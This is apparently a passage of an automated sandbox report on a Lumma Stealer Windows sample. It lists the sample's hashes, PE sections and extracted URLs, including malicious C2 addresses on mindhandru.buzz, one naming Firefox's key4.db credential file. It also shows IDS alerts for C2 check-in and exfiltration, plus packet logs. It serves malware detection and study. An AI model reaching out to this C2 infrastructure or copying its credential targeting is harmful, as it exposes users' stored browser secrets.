                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uWvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaWvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://mindhandru.buzz:443/apixxd8pi.default-release/key4.dbPKWvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgWvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://mindhandru.buzz/apiryBIWvo9FU4qo9.exe, 00000000.00000003.1602922474.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1602657804.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiWvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.mozilla.org/products/firefoxgro.allWvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://mindhandru.buzz/3eWvo9FU4qo9.exe, 00000000.00000003.1598596473.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1641117823.000000000584F000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598617419.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598795849.000000000584F000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000002.1673430816.000000000584F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.11.101
                                                                                          mindhandru.buzzUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1581390
                                                                                          Start date and time:2024-12-27 14:52:13 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 4m 51s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:5
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Wvo9FU4qo9.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:d65dfaafd41de8a252a930da84763e79.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:Failed
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Stop behavior analysis, all processes terminated
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: Wvo9FU4qo9.exe
                                                                                          TimeTypeDescription
                                                                                          08:53:24API Interceptor8x Sleep call for process: Wvo9FU4qo9.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.11.101RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                            GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                  ZvHSpovhDw.exeGet hashmaliciousLummaCBrowse
                                                                                                    8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                      ARoqFi68Nr.exeGet hashmaliciousLummaCBrowse
                                                                                                        DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                            IERiUft8Wi.exeGet hashmaliciousLummaCBrowse
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              mindhandru.buzzRDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.11.101
                                                                                                              LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.67.165.185
                                                                                                              onaUtwpiyq.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              CAo57G5Cio.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              fer4JIJGeL.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              AaEBZ7icLd.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              wJtkC63Spw.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              cFLK1CiiNK.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.165.185
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSJA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                              • 172.64.41.3
                                                                                                              T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 172.64.41.3
                                                                                                              EB2UOXRNsE.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.112.1
                                                                                                              FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.66.86
                                                                                                              gshv2.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.129.233
                                                                                                              OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.216.236
                                                                                                              https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.31.138
                                                                                                              k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.157.254
                                                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.94.92
                                                                                                              FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.25.41
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.101
                                                                                                              FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.101
                                                                                                              FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.101
                                                                                                              OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.11.101
                                                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.101
                                                                                                              FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.11.101
                                                                                                              RDb082EApV.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.11.101
                                                                                                              No context
                                                                                                              No created / dropped files found
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.949755746308833
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:Wvo9FU4qo9.exe
                                                                                                              File size:1'890'304 bytes
                                                                                                              MD5:d65dfaafd41de8a252a930da84763e79
                                                                                                              SHA1:0519330da9c1f922266baddeffd933b3b0a5f705
                                                                                                              SHA256:4448ef4ccedffb399427afd699eb2fdfbbdd74da541bf38bce45b2bab2efde42
                                                                                                              SHA512:741309e8c5d5d7d2a6e47b886458a8da345fe3387a43288aec7c3543237a82dc7e5d792460f578c0c7bb6500ddd0890f86b2a702ca039749dce7cd70b83dc7a7
                                                                                                              SSDEEP:49152:MszFMD2gak5MP6EouEJeMXHSQP9LmCUMNuf2DojGB:MceXDEp+e2f75Nue8G
                                                                                                              TLSH:7295333284B13DF8D92BD97CBABBF408B04986028DA39DA20D1FF56DA17F793B045558
                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................J...........@...........................J......}....@.................................Y@..m..
                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                              Entrypoint:0x8aa000
                                                                                                              Entrypoint Section:.taggant
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                              Instruction
                                                                                                              jmp 00007F3330B81C0Ah
                                                                                                              movzx ebx, byte ptr [eax+eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              jmp 00007F3330B83C05h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [ebx], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [esi], al
                                                                                                              or al, byte ptr [eax]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [esi], al
                                                                                                              add byte ptr [eax], 00000000h
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              adc byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add eax, dword ptr [00000000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              xor byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x520000x26400c8403c12b8df15b5dff711f60d9f13c6False0.9995915032679739data7.982349711059476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              0x550000x2b00000x2008b78d8759cea0375b8761ff7931eadc0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              nefrsmja0x3050000x1a40000x1a360049e4fa0725666da4b0fb1c6fad8975f8False0.9949230393070044data7.954783069172778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              mbmugyej0x4a90000x10000x60059544742c50f6535fd087cfc326d090fFalse0.6178385416666666data5.257624766021435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x4aa0000x30000x2200d9af46214d9874e6feebb135812bddc0False0.07548253676470588DOS executable (COM)0.7473095598233263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-27T14:53:24.925894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949706104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:25.686371+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949706104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:25.686371+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949706104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:27.099697+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949707104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:27.853969+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949707104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:27.853969+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949707104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:30.119269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949708104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:30.964950+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949708104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:32.414989+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949709104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:34.696988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949710104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:37.781848+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:40.357787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949714104.21.11.101443TCP
                                                                                                              2024-12-27T14:53:43.243801+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949715104.21.11.101443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 14:53:23.578650951 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:23.578769922 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:23.578870058 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:23.582706928 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:23.582722902 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:24.925734043 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:24.925894022 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:24.928760052 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:24.928771973 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:24.929020882 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:24.977943897 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.006393909 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.006419897 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.006562948 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:25.686348915 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:25.686454058 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:25.686506033 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.737699986 CET49706443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.737755060 CET44349706104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:25.818500042 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.818531036 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:25.818634987 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.818903923 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:25.818919897 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.099601030 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.099697113 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.101737022 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.101751089 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.102154016 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.103652000 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.103684902 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.103768110 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.853982925 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854042053 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854074001 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854100943 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854125977 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854180098 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.854223013 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.854242086 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.854269028 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.858961105 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.867022991 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.867152929 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.867278099 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.867300034 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.867357969 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.875446081 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.931102991 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.931139946 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:27.977969885 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:27.977991104 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.024828911 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.055135965 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.058917046 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.058947086 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.058969975 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.058985949 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.059039116 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.059045076 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.059066057 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.059109926 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.059381962 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.059391022 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.059400082 CET49707443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.059406996 CET44349707104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.907087088 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.907150030 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:28.907215118 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.907680035 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:28.907695055 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.119160891 CET44349708104.21.11.101192.168.2.9
                                                                                                              Dec 27, 2024 14:53:30.119268894 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.121287107 CET49708443192.168.2.9104.21.11.101
                                                                                                              Dec 27, 2024 14:53:30.121299982 CET44349708104.21.11.101192.168.2.9
